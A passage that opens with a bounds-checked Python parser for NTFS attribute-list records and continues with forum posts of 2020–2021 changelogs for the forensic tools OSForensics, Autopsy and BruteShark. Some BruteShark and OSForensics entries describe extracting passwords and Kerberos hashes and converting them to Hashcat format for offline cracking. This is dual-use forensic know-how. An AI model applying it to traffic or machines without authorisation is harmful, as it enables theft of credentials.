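Added example, not OSForensics code.  Entry layout, little-endian:
  0x00 u32 attribute type     0x04 u16 entry length (8-byte aligned)
  0x06 u8  name length (UTF-16 units)   0x07 u8 name offset from entry start
  0x08 u64 lowest VCN         0x10 u64 MFT reference (record | sequence << 48)
  0x18 u16 attribute instance 0x1A ... UTF-16LE name, if name length > 0
The sample lists at the bottom are constructed.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional

ENTRY_HEADER = struct.Struct("<IHBBQQH")          # 26 bytes (0x1A)
ATTR_TYPE_NAMES = {0x10: "$STANDARD_INFORMATION", 0x20: "$ATTRIBUTE_LIST", 0x30: "$FILE_NAME",
                   0x40: "$OBJECT_ID", 0x50: "$SECURITY_DESCRIPTOR", 0x80: "$DATA",
                   0x90: "$INDEX_ROOT", 0xA0: "$INDEX_ALLOCATION", 0xB0: "$BITMAP",
                   0x100: "$LOGGED_UTILITY_STREAM"}


class MalformedAttributeList(ValueError):
    """Raised in strict mode when an entry's length or name fields do not fit the buffer."""


@dataclass
class AttrListEntry:
    attr_type: int
    lowest_vcn: int
    mft_record: int
    mft_sequence: int
    instance: int
    name: str

    @property
    def type_name(self) -> str:
        return ATTR_TYPE_NAMES.get(self.attr_type, f"0x{self.attr_type:X}")


def _fail(entries: List[AttrListEntry], strict: bool, msg: str) -> List[AttrListEntry]:
    if strict:
        raise MalformedAttributeList(msg)
    return entries          # lenient mode: keep the entries that parsed cleanly before the damage


def parse_attribute_list(buf: bytes, strict: bool = True) -> List[AttrListEntry]:
    entries: List[AttrListEntry] = []
    hdr = ENTRY_HEADER.size
    off = 0
    while off < len(buf):
        if not any(buf[off:]):                # only zero padding left: end of list
            break
        if len(buf) - off < hdr:
            return _fail(entries, strict, f"entry header truncated at offset {off}")
        (attr_type, length, name_len, name_off,
         lowest_vcn, file_ref, instance) = ENTRY_HEADER.unpack_from(buf, off)
        if length < hdr:                      # also stops a zero length from looping forever
            return _fail(entries, strict, f"entry at {off} declares length {length} < {hdr}")
        if off + length > len(buf):
            return _fail(entries, strict, f"entry at {off} declares length {length}, "
                                          f"only {len(buf) - off} bytes remain")
        name = ""
        if name_len:
            name_end = name_off + 2 * name_len
            if name_off < hdr or name_end > length:
                return _fail(entries, strict, f"entry at {off}: name bytes [{name_off}, {name_end}) "
                                              f"fall outside the {length}-byte entry")
            name = buf[off + name_off:off + name_end].decode("utf-16-le", errors="replace")
        entries.append(AttrListEntry(attr_type, lowest_vcn, file_ref & 0xFFFFFFFFFFFF,
                                     file_ref >> 48, instance, name))
        off += length
    return entries


def validate_attribute_list(buf: bytes) -> Optional[str]:
    """None if the list parses cleanly, else a description of the first problem."""
    try:
        parse_attribute_list(buf, strict=True)
    except MalformedAttributeList as exc:
        return str(exc)
    return None


def build_entry(attr_type: int, lowest_vcn: int, mft_record: int, sequence: int,
                instance: int, name: str = "") -> bytes:
    """Encode one entry; used only to construct the samples below."""
    name_bytes = name.encode("utf-16-le")
    length = (ENTRY_HEADER.size + len(name_bytes) + 7) & ~7
    header = ENTRY_HEADER.pack(attr_type, length, len(name_bytes) // 2, ENTRY_HEADER.size,
                               lowest_vcn, (sequence << 48) | mft_record, instance)
    return (header + name_bytes).ljust(length, b"\0")


# Constructed: a file whose attributes spill from MFT record 1234 into record 1235.
SAMPLE_LIST = b"".join([
    build_entry(0x10, 0, 1234, 7, 0),
    build_entry(0x30, 0, 1234, 7, 1),
    build_entry(0x80, 0, 1234, 7, 2),                        # unnamed $DATA
    build_entry(0x80, 0, 1234, 7, 3, "Zone.Identifier"),     # named $DATA stream
    build_entry(0x80, 4096, 1235, 2, 3, "Zone.Identifier"),  # its continuation from VCN 4096
])
# Constructed corruption: declared length (512) reaches far past the 26 bytes present ...
CORRUPT_LENGTH = SAMPLE_LIST + ENTRY_HEADER.pack(0x80, 0x200, 0, 0x1A, 0, 1234, 9)
# ... and a name of 40 UTF-16 units (80 bytes) inside a 32-byte entry.
CORRUPT_NAME = SAMPLE_LIST + ENTRY_HEADER.pack(0x80, 32, 40, 0x1A, 0, 1234, 9).ljust(32, b"\0")

if __name__ == "__main__":
    for e in parse_attribute_list(SAMPLE_LIST):
        print(f"{e.type_name:22} name={e.name!r:18} vcn={e.lowest_vcn:<5} mft={e.mft_record}/{e.mft_sequence}")
    print("corrupt length:", validate_attribute_list(CORRUPT_LENGTH))
    print("corrupt name:  ", validate_attribute_list(CORRUPT_NAME))
```

The parser never allocates from a disk-supplied size; it slices the buffer it was given, which is the Python equivalent of the "dynamic-sized buffer" the changelog describes. Whether to stop (strict) or keep the clean prefix (lenient) is a triage decision: strict is right for anything that feeds an automated pipeline, lenient for an examiner who wants to see as much of a damaged record as can be trusted.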
Titel: OSForensics 7.1.1011
Beitrag von: SiLæncer am 20 April, 2020, 13:00
Changelog

    Case Manager:

    When deleting case, fixed case being deleted even when cancelling option to export case to disk

    Deleted Files:

    Fixed an issue where Prefetch and SRUMDB info wasn't being read correctly and would return 0 items
    Fixed a possible crash when collecting SRUMDB info

http://www.osforensics.com/
Titel: Autopsy 4.15.0
Beitrag von: SiLæncer am 01 Mai, 2020, 20:00
Changelog

    New UI Features:

    Added Document view to File Discovery.
    Expanded Context Content Viewer to show if an app accessed a file.
    Added translation feature to Message Content Viewer.
    Added waypoint type filter to the Geolocation viewer.
    Added zoom feature to Indexed Text Content Viewer.

    New Ingest Modules Features:

    New GPX ingest module.
    New Drone ingest module for DJI drones based on DatCon.
    Create artifacts for files opened by Adobe Reader, Windows Media Player, Office Docs (Most Recently Used (MRU) and TrustRecords), 7Zip MRU, WinRAR MRU, Applets, Microsoft Management Console (MMC) via RegRipper.

    New Central Repository Features:

    Central Repository stores account IDs that were previously seen.
    Central Repository is enabled by default to store past hashes. Feature to flag previously seen files is disabled by default.

    Other New Features:

    Multi-user cases can be created via command line

    Bug fixes:

    Prevent entire application from crashing when gstreamer crashes on videos.
    Improve Geolocation viewer with large data sets.
    Fix error with non-sector aligned reads on local disks.
    Times from Recycle Bin files are now in timeline.
    Validate timeline events and ignore events too far in the future.
    Moved some database queries off of UI thread.
    Remove hard coded sizes from UI that cause issues with other languages.

http://www.sleuthkit.org/autopsy
Titel: OSForensics 7.1.1012
Beitrag von: SiLæncer am 28 Mai, 2020, 18:00
Changelog

    Case Manager:

    Fixed a crash that could occur when loading a case if a category name was longer than the max (63 characters).
    Fixed a bug allowing categories to be added with names longer than the max (63 characters).

    Create Index:

    Fixed crash bug when indexing smaller binary files (<25MB) with multi-threads.
    Fixed bug with 32-bit indexer failing to launch.

    Deleted Files:

    Carving, thread safety updates.
    Carving, fixed bug (read an offset outside of buffer) causing possible crash when carving TIFF files.

    Mobile Artifacts:

    Potential stack overflow crash fix.

http://www.osforensics.com/
Titel: OSForensics 8.0.3 Beta
Beitrag von: SiLæncer am 14 August, 2020, 19:00
Changelog

    Added New Face Detection module for still photographs & images:

    "Detect Faces" button was added in the Image Viewer
    "Sort by Faces" in File Name Search module was added. Depending on the set of images, accuracy is around 80% at the moment. We are hoping to get closer to 95% before the final release. This can make sorting through large collections of images much much faster

    Added new Web Server Log Viewer module:

    Can load up log files from Apache, IIS and other web servers, then filter and sort the log data. A lot of effort was invested to support the loading of very large log files without having huge amounts of system RAM

    Added new Python Scripting module:

    Implemented new scripting engine, which allows access to internal OSF functions from Python scripting. Scripting commands such as osf.UserActivityGetResult(), osf.ReportGenerate() & osf.LogicalImageStart() are now available
    Added support for built-in script Python templates installed under ProgramData\PassMark\OSForensics\ScriptTemplates. The template can be selected under the 'New Script' button dropdown
    Added Python API reference for help file

    Added new Cloud Imaging support for Forensic Imaging:

    Added Cloud Download/Imaging for Google Drive, Microsoft OneDrive and Dropbox
    Cloud imaging will create empty files (0 byte files with ".deleted" extension) for deleted items from Dropbox. Dropbox includes deleted files in their directory listing

    AmCache Viewer:

    Improved performance of reading amcache hive

    Case Management:

    Add support for opening tagged e-mails & attachments via double-click/right-click

    Create Index:

    Added indexing for HEIC and HEIF image files (from Apple devices)
    Allowed indexing of memory dump files, including .mem, .dmp and .mdmp (large file support does not apply if inside ZIP files)
    Improved speed of large binary file extraction indexing (by way of parallel / 2 thread concurrency)
    Fixed bytes progress status when indexing large binary file
    Added Email Attachment indexing options ("index attachments by file types")
    Fixed exiftool indexing issue (using the -fast3 parameter culled out a lot of necessary meta information AND may incorrectly identify file type. Note: with the -fast optimization removed, indexing will now be slower)
    Fixed indexing of some GPS meta information from exiftool
    Fixed issue with indexing OCR output from HEIC and HEIF files

    Create Signature:

    Added support for SHA-256 hashes. This required changing the signature file format and incrementing the signature file version from 6 -> 7
    Add support for comparing previous signature file version with v7 signature file

    Email Viewer:

    Support opening single e-mails from PST/DBX/MBOX files for faster loading
    Added exporting e-mail messages to MSG file format
    Add checkboxes to e-mail messages for bulk operations

    File name search:

    Changed configuration dialog to support modifying include/exclude folders for each preset. This allows for more accurate preset searches to be defined. Users can also define their own preset searches in the new advanced format
    Preset searches are now fixed and cannot be modified inline
    Added 'User-defined Search' for fully customizable search criteria

    Forensic Imaging:

    Add option to select between single/split files when creating Encase E01 image files

    Image Viewer:

    Added support for HEIC and HEIF image files (from Apple devices)
    Added support for extracting meta data from HEIC and HEIF files

    Passwords:

    Improved performance of reading Firefox, IE & Windows logins from registry
    Fix heap corruption when retrieving LSA secrets
    Fixed various memory leak issues

    Registry reading:

    Improved performance of RegistryGetSubKeys() and RegistryGetKeyValues() methods for reading registry keys
    Improved performance of reading registry entries in User Activity. On a 160MB SOFTWARE hive, load times improved from >10min to 20s (as compared to v7)
    Added new registry function to read a single key in a hive for better performance without loading the entire registry file first

    ThumbCache Viewer (complete rewrite):

    Redesigned the interface allowing to load a single cache file, add multiple files by scanning drive or folder
    Added a tree view to show list of added cache files, folders and drives
    Added a new "All" option to the Thumbnail Size combo box to show all records in a cache index file
    Added a new feature to allow loading multiple cache files and viewing all of the records in them in a single list view
    Added Extended Information to show EXIF data of thumbnails retrieved from ESE Database
    Updated the thumbnail preview window to be resizable
    Improved the efficiency of loading ESE Database

    Thumbnail View of files in various modules:

    Added support for displaying thumbnails for video files
    Support for animated video thumbnails on mouse hover (how cool is this!!)
    Changes to thumbnail caching thread for better performance and robustness
    Added support for deleted video thumbnails
    Files that do not have thumbnails are cached and no longer reloaded

    User Activity:

    Fixed bug in opening ARES registry key path
    Added more Windows Event IDs to extract more forensically interesting logs
    Added times to Browser Bookmarks and WLAN items
    Fixed Time Source display error for some items under All category
    Changed list-view default sorting as date and time descending order
    Improved column sorting speed. Sorting large data sets is now 50x faster
    Updated column names for Autorun Commands and UserAssist

    Boot Virtual Machine:

    Added the ability to select additional hard drives (data drives) when booting a VM from a disk image

http://www.osforensics.com/
Titel: Autopsy 4.16.0
Beitrag von: SiLæncer am 10 September, 2020, 09:07
Changelog

    Ingest:

    Added streaming ingest capability for disk images that allow files to be analyzed as soon as they are added to the database.
    Changed backend code so that disk image-based files are added by Java code instead of C/C++ code.

    Ingest Modules:

    Include Interesting File set rules for cloud storage, encryption, cryptocurrency and privacy programs.
    Updated PhotoRec 7.1 and include 64-bit version.
    Updated RegRipper in Recent Activity to 2.8
    Create artifacts for Prefetch, Background Activity Monitor, and System Resource Usage.
    Support MBOX files greater than 2GB.
    Document metadata is saved as explicit artifacts and added to the timeline.
    New “no change” hashset type that does not change status of file.

    Central Repository / Personas:

    Accounts in the Central Repository can be grouped together and associated with a digital persona.
    All accounts are now stored in the Central Repository to support correlation and persona creation.

    Content viewers:

    Created artifact-specific viewers in the Results viewer for contact book and call log.
    Moved Message viewer to a Results sub-viewer and expanded to show accounts.
    Added Application sub-viewer for PDF files based on IcePDF.
    Annotation viewer now includes comments from hash set hits.

    Geolocation Viewer:

    Different data types now are displayed using different colors.
    Track points in a track are now displayed as small, connected circles instead of full pins.
    Filter panel shows only data sources with geo location data.
    Geolocation artifact points can be tagged and commented upon.

    File Discovery:

    Changed UI to have more of a search flow and content viewer is hidden until an item is selected.

    Reports:

    Can be generated for a single data source instead of the entire case.
    CASE / UCO report module now includes artifacts in addition to files.
    Added backend concept of Tag Sets to support Project Vic categories from different countries.

    Performance:

    Add throttling of UI refreshes to ensure data is quickly displayed and the tree does not get backed up with requests.
    Improved efficiency of adding a data source with many orphan files.
    Improved efficiency of loading file systems.
    Jython interpreter is preloaded at application startup.

    Misc bug fixes and improvements:

    Fixed bug from last release where hex content viewer text was no longer fixed width.
    Altered locking to allow multiple data sources to be added at once more smoothly and to support batch inserts of file data.
    Central repository comments will no longer store tag descriptions.
    Account type nodes in the Accounts tree show counts.
    Full time stamps displayed for messages in ingest inbox.
    More detailed status during file exports.
    Improved efficiency of adding timeline events.
    Fixed bug with CVT most recent filter.
    Improved documentation and support for running on Linux/macOS.

http://www.sleuthkit.org/autopsy
Titel: BruteShark 1.1.1
Beitrag von: SiLæncer am 16 September, 2020, 05:00
(https://i.postimg.cc/SKYnyNkt/screenshot-2749.png)
BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extraction, building a network map, reconstructing TCP sessions, extracting hashes of encrypted passwords and even converting them to a Hashcat format in order to perform an offline brute-force attack.

License: GPLv3

Whats new:>>

    BruteShark is now capable of reconstructing all UDP streams as well.
    Configuration buttons were added for enabling / disabling reconstruction of TCP and / or UDP sessions

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1002
Beitrag von: SiLæncer am 09 November, 2020, 09:20
Changelog
       
    Auto Triage

        Fixed a broken link to the Auto Triage section in the help file

    Install to USB

        Fixed an issue where a ket.dat file created by OSForensics would not be read correctly when OSForensics starts

    Workflow

        Started saving config file immediately after locking the workflow rather than when OSForensics was closed so changes made to the workflow will be applied when installing to USB

http://www.osforensics.com/
Titel: Autopsy 4.17.0
Beitrag von: SiLæncer am 10 November, 2020, 12:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

    GUI:

    Expanded the Data Source Summary panel to show recent activity, past cases, analysis results, etc. Also made this available from the main UI when a data source is selected.
    Expanded Discovery UI to support searching for and basic display of web domains. It collapses the various web artifacts into a single view.

    Ingest Modules:

    Added iOS Analyzer module based on iLEAPP and a subset of its artifacts.
    New Picture Analyzer module that does EXIF extraction and HEIC conversion. HEIC/HEIF images are converted to JPEGs that retain EXIF using ImageMagick (replaces the previous EXIF ingest module).
    Added support for the latest version of Edge browser that is based on Chromium into Recent Activity. Other Chromium-based browsers are also supported.
    Updated the rules that search Web History artifacts for search queries. Expanded module to support multiple search engines for ambiguous URLs.
    Bluetooth pairing artifacts are created based on RegRipper output.
    Prefetch artifacts record the full path of exes.
    PhotoRec module allows you to include or exclude specific file types.
    Upgraded to Tika 1.23.

    Performance:

    Documents are added to Solr in batches instead of one by one.
    More efficient queries to find WAL files for SQLite databases.
    Use a local drive for temp files for multi-user cases instead of the shared folder.

    Command Line:

    Command line support for report profiles.
    Restored support for Windows file type association for opening a case in Autopsy by double clicking case metadata (.aut) file.
    Better feedback for command line argument errors.

    Misc:

    Updated versions of libvmdk, libvhdi, and libewf.
    Persona UI fixes: Pre-populate account and changed order of New Persona dialog.
    Streaming ingest support added to auto ingest.
    Recent Activity module processes now use the global timeout.
    Option to include Autopsy executable in portable case (Windows only.)
    Upgraded to NetBeans 11 Rich Client Platform.
    Added debug feature to save the stack trace on all threads.

http://www.sleuthkit.org/autopsy
Titel: OSForensics 8.0.1003
Beitrag von: SiLæncer am 25 November, 2020, 10:00
Changelog

    Case Management

        Added a continue / stop option when a file copy fails (e.g. when creating a case report) rather than just stopping the current process

    Cloud Mail Export

        User can select which folder to export from account. An MBOX file will be created separately for each folder exported

    Deleted Files

        Added option in configuration to disable thumbnail creation as it may cause crashes in external Windows libraries used to generate the thumbnails (e.g. media player) on poorly recovered / corrupt files

    File Name Search

        Added a new feature to allow for searching against image EXIF metadata

    OSFExtract

        Fixed issue where OSFExtract app would fail to install on older Android OS devices due to app signing issue

    Subscription

        Added deactivate seat option to the start page

    User Activity

        Event log, fixed a crash that could occur when reading a System log file caused by a very long file path in the event information

http://www.osforensics.com/
Titel: BruteShark 1.1.2
Beitrag von: SiLæncer am 01 Dezember, 2020, 19:00
(https://i.postimg.cc/SKYnyNkt/screenshot-2749.png)
BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstructing TCP sessions, extracting hashes of encrypted passwords and even converting them to a Hashcat format in order to perform an offline brute-force attack.

License: GPLv3

What's new:

New features:

    New hash type extraction - Kerberos AS-REP etype 23 (including Hashcat integration - mode: 18200)
    BruteSharkCli can now export the network map to JSON format for analysis with external tools such as Neo4j.
    File extraction module support for PDF and ZIP file formats.
    BruteSharkDesktop GUI improvements - Indication for files that failed the analysis.

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1004
Beitrag von: SiLæncer am 04 Dezember, 2020, 10:00
Changelog
       
    Email Viewer

        Remove MAPI initialization from startup, loading on-demand
        Attempt to load MAPI dll from Outlook installation in registry (rather than mapi32.dll in Windows\System32) to prevent a "No mail client found" error message in some cases

    File Name Search

        Added vcruntime140_1.dll for exiv2.exe tool to fix missing DLL issue
        Updated EXIF Metadata search keywords preset list

    Hash Set Import

        Fixed a crash that could occur when importing NSRL hash sets

http://www.osforensics.com/
Titel: BruteShark 1.1.3
Beitrag von: SiLæncer am 14 Dezember, 2020, 21:30
What's new:

New Module Release: DNS Module.
The module enables parsing of DNS queries.
DNS data is also shown in the Network Map user window.

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1005
Beitrag von: SiLæncer am 29 Dezember, 2020, 10:00
Changelog
              
    Auto Triage

        Upgraded the screen capture to take screenshots of all running program windows.
        Removed the drive selection drop-down list and changed it to select the OS boot drive to perform live acquisition scanning.

    Case manager

        Fixed an issue when exporting a report using the copy files option: if a source file was read-only, multiple error messages could be shown during the file copy process.

        Improved speed of export when large numbers of files are being exported as part of the report

    USEDB viewer

        Updated library code for compatibility with newer helper libraries

    Verify Hash

        Fixed a bug where clicking the "upper case output" option after generating a hash would not update the primary hash and instead replace the secondary hash with the upper case primary

    File system support

        Updated library code for reading E01 and L01 files. While there were multiple changes under the hood, the most visible change should be better support for L01 image files. In particular it fixes a case where an NTFS directory entry in an L01 could point to the wrong file.

http://www.osforensics.com/
Titel: BruteShark 1.1.4
Beitrag von: SiLæncer am 09 Januar, 2021, 09:00
What's new:

BruteShark can now handle pcapng files (as well as the old pcap file format).
PCAPNG example files were added to the repo, so you can check it yourself: https://github.com/odedshimon/BruteShark/tree/master/Pcap_Examples/Pcap_Examples_PCAPNG

https://github.com/odedshimon/BruteShark
Titel: BruteShark 1.1.5
Beitrag von: SiLæncer am 23 Januar, 2021, 10:00
What's new:

BruteSharkCli now has two modes: single command and shell mode. The single command mode works by getting all the relevant parameters for the processing and then printing the results to stdout or files. The shell mode allows performing each step individually.

https://github.com/odedshimon/BruteShark
Titel: BruteShark 1.1.6
Beitrag von: SiLæncer am 25 Januar, 2021, 20:00
What's new:

Added exporting of extracted files to BruteSharkCli.
Fixed a bug while exporting the network map to JSON.

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1006
Beitrag von: SiLæncer am 28 Januar, 2021, 20:00
Changelog
              
    Auto Triage

        Updated select drives dialog.
        Renamed "Deleted Files" to "List of Deleted Files"
        Renamed "File Listing (Signature)" to "File Listing"
        Added timezone to Process List and File Listing exporting CSV
        Updated to add not only the OS boot drive but also all the other available logical and physical drives to case, and then scan all of them to create file listing
        Deleted file search, updated to scan all drives available and export to CSV files separately
        Added drive selecting options for file listing and deleted files searches

    Case Manager

        Add Device, Added debug output when populating device dropdown
        More robust handling of case device dropdown
        Added more verbose logging during case load

    Forensic Imaging

        Removed unnecessary refreshing of drive dropdown when loading Create Image tab
        Added more verbose logging when opening Forensic Imaging window
        Added debug output when populating device dropdown

http://www.osforensics.com/
Titel: OSForensics 8.0.1007
Beitrag von: SiLæncer am 17 Februar, 2021, 13:00
Changelog
       
    Auto Triage

        Fixed an issue in the Logical Image configuration window where a non-system drive path was not added properly to the image creation list.

    User activity

        Fixed a crash that could occur when removing the filter after using timeline view to view and select files at a certain time

http://www.osforensics.com/
Titel: BruteShark 1.2.0
Beitrag von: SiLæncer am 08 März, 2021, 23:30
What's new:

Both versions of BruteShark are now capable of live capturing and analyzing network data directly from a network interface!
This version features everything required for operating the live capture option easily and smoothly:

    List all available network interface names.
    Enable configuring BPF filters.
    Enable using promiscuous mode.

https://github.com/odedshimon/BruteShark
Titel: BruteShark 1.2.1
Beitrag von: SiLæncer am 11 April, 2021, 21:00
What's new:

Both versions of BruteShark (BruteSharkDesktop & BruteSharkCli) are now capable of extracting VoIP calls.

    VoIP calls can be exported to raw-audio files
    Example PCAP files were added to the repo.

https://github.com/odedshimon/BruteShark
Titel: BruteShark 1.2.2
Beitrag von: SiLæncer am 02 Mai, 2021, 10:00
What's new:

    Fixed a bug that caused Kerberos hashes over TCP not to be extracted, due to a lack of proper parsing of the "Record mark" section (see issue #90).
    Implemented parsing of Kerberos TGS-REP etype 17 and 18 hashes, including Hashcat export.
    Upgraded all projects' NuGets.
    Added a link to download BruteSharkCli for Windows.

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1008
Beitrag von: SiLæncer am 07 Juni, 2021, 09:00
Changelog
       
    CloudMail

        Fixed issue with Microsoft Outlook/Hotmail email when Content-Length is not returned in the header, but response body contains text

    ThumbCache Viewer

        Fixed an issue where Thumbnail items were not able to add to the case

    User Activity

        Form Autofill, fixed crash with change to Autofill in Edge Chromium when data value in sqlite db is not encrypted
        Passwords, fixed wireless network passwords recovery issue
        Passwords, fixed Firefox browser password recovery bugs

    Misc

        Fixed Typo in Expiration/Subscription GUI Text

http://www.osforensics.com/
Titel: Autopsy 4.18.0
Beitrag von: SiLæncer am 01 August, 2021, 09:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

Keyword Search:

    A major upgrade from Solr 4 to Solr 8.6.3. Single user cases continue to use the embedded server.
    Multi-user clusters need to install a new Solr 8 server and can now create a Solr cloud with multiple servers.
    -- NOTE: Cases created with Autopsy 4.18 cannot be opened by previous versions of Autopsy. Autopsy 4.18 can open older cases though.
    -- See http://sleuthkit.org/autopsy/docs/user-docs/4.18.0/upgrade_solr8_page.html for more details.
    Improved text indexing speed by not doing language detection on unknown file formats and unallocated space.

Domain Discovery:

    Added details view to Domain Discovery to show what web-based artifacts are associated with the selected domain.
    Updated the Domain Discovery grouping and sorting by options.
    Added basic domain categorization for webmail-based domains.

Content Viewers:

    Built more specialized viewers for web-based artifacts.

Data Source Summary:

    Added a “Geolocations” tab that shows what cities the data source was near (based on geolocation data).
    Added a “Timeline” tab that shows counts of events from the last 30 days the data source was used.
    Added navigation buttons to jump from the summary view to the main Autopsy UI (for example to go to the map).

Ingest Modules:

    New YARA ingest module to flag files based on regular expression patterns.
    New “Android Analyzer (aLEAPP)” module based on aLEAPP. Previous “Android Analyzer” also still exists.
    Updated “iOS Analyzer (iLEAPP)” module to create more artifacts and work on disk images.
    Hash Database module will calculate SHA-256 hash in addition to MD5.
    Removed Interesting Item rule that flagged existence of Bitlocker (since it ships with Windows).
    Fixed a major bug in the PhotoRec module that could result in an incorrect file layout if the carved file spanned non-contiguous sectors.
    Fixed MBOX detection bug in Email module.

Reporting:

    Attachments from tagged messages are now included in a Portable Case.

Misc:

    Added support for Ext4 inline data and sparse blocks (via TSK fix).
    Updated PostgreSQL JDBC driver to support any recent version of PostgreSQL for multi-user cases and PostgreSQL Central Repository.
    Added personas to the summary viewer in CVT.
    Handling of bad characters in auto ingest manifest files.
    Assorted small bug fixes.

http://www.sleuthkit.org/autopsy
Titel: Autopsy 4.19.0
Beitrag von: SiLæncer am 02 August, 2021, 19:00
Changelog

Data Source Management:

    To make managing big cases easier, all data sources are now associated with a host that can be specified in the “Add Data Source” wizard.
    Hosts can be grouped by “person”, which is simply a name of the owner.
    The main tree viewer can be configured to group by person and host.

OS Accounts:

    Operating System (OS) accounts and realms are their own data types and no longer generic artifacts.
    OS Accounts are created for Windows accounts found in the registry. Domain-scoped realms are not fully detected yet.
    NTFS files are associated with OS Accounts by SID.
    The Recent Activity module associates artifacts with OS Accounts based on SID or path of database. Other modules still need to be updated.
    OS accounts appear in a dedicated sub-tree of the main tree view and their properties can be viewed in the results view.
    A new content viewer in the lower right area of the main window was built to display OS account data for the item selected in the results view.

Analysis Result and Data Artifacts

    All modules make either Analysis Results or Data Artifacts instead of “Blackboard Artifacts.”
    New “Analysis Result” content viewer shows the results for a given file and its score.
    The tabular results viewer shows an icon for the aggregate score of a file.
    The tree organizes results into "Analysis Results" and "Data Artifacts" instead of simply “Results.”

Discovery UI:

    Domain categorization and account types are displayed in Domain Discovery results.
    The Domain Discovery results view more explicitly shows when a downloaded file no longer exists.
    Check boxes are now used to select search options instead of shift-based multi-select.

Ingest Modules:

    File metadata updates are batched up before being saved to the case database for better performance.
    Parsing of iLEAPP and aLEAPP output was expanded to create communication relationships which can be displayed in the Communications UI.
    EML email parsing handles EML messages that are attachments (and have their own attachments).
    Domain categorization within Recent Activity can be customized by user-defined rules that can be imported and exported.
    Account IDs and Installed Applications are added to the Central Repository.
    Keyword search can be configured to only do OCR and skip non-OCR files.

Miscellaneous:

    A “Reset Windows” feature was created to help redock windows.
    A case-insensitive wordlist of all words in the keyword search index can be exported as a text document.
    Information from the Data Source Summary panels can be exported as an Excel spreadsheet.
    More artifacts are added to the timeline and artifacts with multiple time-based attributes are mapped to multiple timeline events.
    Added option to only perform optical character recognition on certain file types.
    Heap dumps can be saved to a custom location.
    More detailed error messages about encrypted disks when they are added.
    Added file size filter to Ingest Filters.

Performance:

    Keyword search does not make an explicit commit for each report if ingest is running.
    Language ID is performed on a small subset of a file instead of the entire file.
    Recent Activity is more efficient because of TSK changes to file searching (using extension).
    Embedded file extractor module has been made faster by doing file typing in memory and adding extracted files in batches.
    Moved Content Viewers setNode() and isSupported()/isPreferred() code to background threads.
    Moved Data Source Summary Panel population code to background threads.
    Moved Node/Tree queries to background threads.

Bug Fixes:

    Fixed embedded file extractor file name escaping bug.
    Detect VHD files by signature and not extension.
    Fixed iLEAPP path error.
    Content viewers UIs are more consistent.
    Assorted bug fixes are included.

Auto Ingest:

    The Auto Ingest Dashboard is resizable.
    Get thread dumps from AID
    Added beta pause feature that pauses auto ingest for a set amount of time at a scheduled date and time.

http://www.sleuthkit.org/autopsy
Titel: OSForensics 9.0.1000
Beitrag von: SiLæncer am 05 August, 2021, 09:00
Changelog
       
    Map Viewer:

    Added Map Viewer module which enables users to view GPS locations marked on a world map.
    Added a new pre-set search option, “Photos with GPS Locations” to automatically find all photos with embedded GPS locations (via EXIF data) and then graphically locate where these photographs were taken on a map. On mouse over of the location on the map thumbnail images and image meta are displayed.
    Ability to import and map GPS coordinates from CSV, GPX and KML files and IP addresses, and search for GPS location by name (i.e. geocoding)
    Added map email viewer integration, to draw arrows between the source and destination of an Email, plus any intermediate transit nodes referenced in Email header.

    Auto Triage:

    Removed some unnecessary warning messages (You are attempting a non-live…) displayed when running Auto Triage
    Updated the Passwords to select "Live acquisition" for scan when running Auto Triage.

    Boot VM:

    Updated to now allow booting for macOS (10.13 and above)
    Now includes support for VMware Workstation Player 16

    Clipboard Viewer and Signatures Module:

    Restructured UI for consistency and simplicity in OSForensics user experience

    Create / Search Index:

    Restructured UI for simplified user experience. This included convert to 'Sort' link, convert to 'Index' link, move 'Use Word List File' to button dropdown, and consolidated regex filter to search bar.
    Improved indexing of XML files to index not only data content, but also attribute values in tags. Combined with expanding the max word length to 40 characters, this now allows indexing of GUID values in XML files. This allows finding GUIDs in peer-2-peer file sharing files (e.g. Profiles.xml file from Shareaza)
    Added sub tabs under ‘Browse Index’. These include Words, Files and Protected lists.
    Added "Save to disk" checked items menu option
    Reporting of “protected” (or encrypted) files that were encountered and not indexed. Provides a quick way to identify all commonly encrypted document types.
    Fixed bug with "Search Index", when matching exact phrases only found in meta description
    Fixed crash bug for when page is near end of index
    Fixed bug with extra text appearing after highlighting when exact phrase matched in meta description
    Fixed timeline filter and other UI issues
    Fixed cleanup of previous state when closing case
    Fixed bug with email indexing causing corrupt index when long header or attachments are used as description in index
    Fixed crash bug when corrupt index is encountered during a search and cleanup occurs, and subsequent searches did not reload the index
    Added handling for partial index unloaded/reloading due to unexpected error cases (low memory, corrupt index, etc.)

    Disk Preparation:

    Fixed a bug stopping Disk 0 from being formatted

    Decrypt File:

    Password Benchmark (i.e. num password per second) is now calculated per thread. Previously only the first benchmark collected was used as the benchmark value for all clients.

    Deleted File Recovery:

    Restructured UI for consistency and simplicity (convert to 'Sort' link, convert to 'Preset' link, reduce clutter at the bottom)
    Added ability to right click on an extension in the scan status tab to view the set of files.
    Added the Face and Nudity Scan feature to the sorting option
    FileCarver Config GUI changed the +/- icons to normal expand/collapse icons. Removed the Linux EXT2 option, FileCarver will try to determine the file system and enable it if necessary.
    Fixed display bug where scrolling to the right and then back, where the listview checkbox/extension column would be unreadable. Added note to expand the extension groups to view the header/footer/etc details for each extension family.
    Fixed a crash that could occur when no files were found

    Device Manager:

    Added support for per-volume encryption, as used in newer versions of Apple’s APFS file system.

    Email Viewer

